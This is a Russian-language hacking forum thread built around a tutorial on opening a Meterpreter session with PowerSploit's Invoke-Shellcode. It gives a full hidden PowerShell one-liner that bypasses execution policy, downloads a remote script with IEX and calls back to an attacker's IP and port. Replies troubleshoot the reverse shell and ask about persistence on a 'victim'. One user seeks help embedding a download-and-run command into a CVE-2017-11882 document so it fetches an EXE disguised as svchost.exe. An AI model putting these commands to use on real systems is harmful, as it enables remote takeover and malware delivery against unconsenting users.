<~DarkNode~>

~^M1st3r_Bert0ni^~
Platinum
19.10.2016
722
3 099
BIT
0
Возник вопрос,возможно не по теме....Но как можно сохранить сессию по данному способу так,что бы к ней можно было подключиться из под другой сети ?
Это уже в сторону закрепления в системе.Просто персистенс сделать ,что бы в дальнейшем можно было подключаться к жертве.Но опять же таки если речь идет про реверс соединение ,то нам в любом случае нужно знать айпи машины для того что бы сделать на нее реверс конект
 

ActionNum

Well-known member
27.11.2016
80
93
BIT
0
что-то не получается. один ноут на win 7 на другом кали 1. запускаю на кали use exploit/multi/handler и set payload windows/meterpreter/reverse_https. в винде (Powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX(New-Object Net.WebClient).DownloadString(' link removed Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.1.37 -Lport 8443 -Force) lhost и lport одинаковый. сделал в винде Set-ExecutionPolicy Unrestricted отключил брандмауэр отключил контроль учетных записей и сессия не приходит. netstat -na не показывает соединения, но в процессы висят. в какую сторону копать?
Для начала посмотри, точно ли у тебя все пинги проходят, от таргет компа до листнера и в обратную сторону.
 

Elektrolife

Green Team
21.10.2016
208
33
BIT
27
Ну а как же понять...и как научиться никто не хочет помочь.
[doublepost=1484053847,1484053367][/doublepost]Как понял вы это делали на виртуалке...аналогично что на метасплойт кали линукс, если вы это имели ввиду...то конечно же это понятно...но работает ли это на реальных машинах...у меня есть два компа, на которых я могу третиноваться...может все-таки поможете?

Советую начать с курса CEH - Этичный хакинг и тестирование на проникновение. Поможет для общего понимания что и зачем делать.
 
N

nurik2000

На вирт. машине стоит Win7 SP1 там PS версии 2, после запуска окно PS закрывается, процесс висит в диспетчере, но соединения нет. Пинги проходят в обе стороны, и с Unicorn-ом та же история, может PS обновить.
[doublepost=1506592812,1506576232][/doublepost]Поддерживают ли скрипты reverse_tcp и _https версию Wln7 PS ver. 2?
 
09.11.2017
258
262
BIT
5
я тут взял эту штукенцию и проверил не менял айпи какой был такой и оставил нажал он куда отправился в какую вселенную можно потом от этого избавиться?)
 
L

llein

Вопрос к компетентным товарищам - реально ли такое провернуть не со скриптом PS, а с exe?
И,да, перегонять в формат .ps1 через штатный exe2hex я пробовал, конечный скрипт не запускается. Через тот же самый IEX - тоже никак.
Поскажите, пожалуйста, я себе уже мозг сломал
 

<~DarkNode~>

~^M1st3r_Bert0ni^~
Platinum
19.10.2016
722
3 099
BIT
0
Вопрос к компетентным товарищам - реально ли такое провернуть не со скриптом PS, а с exe?
И,да, перегонять в формат .ps1 через штатный exe2hex я пробовал, конечный скрипт не запускается. Через тот же самый IEX - тоже никак.
Поскажите, пожалуйста, я себе уже мозг сломал
Какая цель?
Создать из скрипта бинарный файл?
Или подгрузить бинарный файл?
 
L

llein

Какая цель?
Создать из скрипта бинарный файл?
Или подгрузить бинарный файл?

Чуть больше конкретизирую: используется CVE-2017-11882. В качестве исполняемой строки в документ вкладывается шеллкод, качающий из внешней Сети ЕХЕ и запускающий его.
Пока дошел до этого:

Powershell.exe -NoP -NonI -Exec Bypass; Invoke-WebRequest -Uri -OutFile .\svchost.exe; .\svchost.exe

При запуске в cmd - все ок.
При "вклеивании" в rtf/doc ничего не происходит, EXE не качается

Вопрос, как к общепризнанному гуру шелла: что можно придумать в такой ситуации, не выкидывая при этом из "условий задачи" 2017-11882 и ЕХЕ?
 
C

Casp

начал изучать вопрос, в голове куча вопросов.
[doublepost=1513690658,1513690442][/doublepost]
Часть 1
Следующая часть
Все части

Приветствую Вас колеги. Как Вы уже поняли речь пойдет о знакомствах с базовыми возможностями PowerShell и области применения хакерских техних.
И начнем мы пожалуй сегодня с использования скриптов PowerSploit -( скрипты написанные на PowerShell для пост эксплуатации Windows систем)

Первым примером использования PowerSploit - это будет пример простого и быстрого получения метерпретер сессии на примере скрипта Invoke-Shellcode.ps1

Посмотреть вложение 7609

Для начало сходим на гитхаб по ссылке:
Код:
https://github.com/cheetz/PowerSploit/blob/master/CodeExecution/Invoke--Shellcode.ps1
Посмотреть вложение 7612

Жмакним на клавишу RAW - что бы получить ссылку для скачивания в чистом виде
Код:
https://raw.githubusercontent.com/cheetz/PowerSploit/master/CodeExecution/Invoke--Shellcode.ps1
Эту ссылку мы потом используем для нашей команды PowerShell,а пока можно в скрипте в комментариях увидеть опциональные параметры и примеры для его запуска:

Посмотреть вложение 7611

Копируем урл нашего скрипта и готовим следующую команду:
Код:
Powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/PowerSploit/master/CodeExecution/Invoke--Shellcode.ps1'); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.137.137 -Lport 1337 -Force
***Скрытый текст***Собственно вызов нашего скрипта после его загрузки с параметрами (IP аддрес и порт Атакуещей машини) и тип пейлоада метасплоита.
Посмотреть вложение 7613

Посмотреть вложение 7614

Собственно говоря и все)

Запускаем данную команду и к нам прилетает метерпретер сессия)
Можно еще для удобства сократить урл к скрипту на гитхабе через сервисы сокращения ссылок)

Всем спасибо) Продолжения следует)

***Скрытый текст***
Следующая часть
Все части
Можно видео перезалить?
 

Jack S

New member
05.09.2019
1
0
BIT
2
Народ, такая ситуация, при запуске команды в ps он выдаёт что проверьте синтаксис и то что invokeshellcode не найдена хотя взял весь код и скопировал. Что может быть?
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!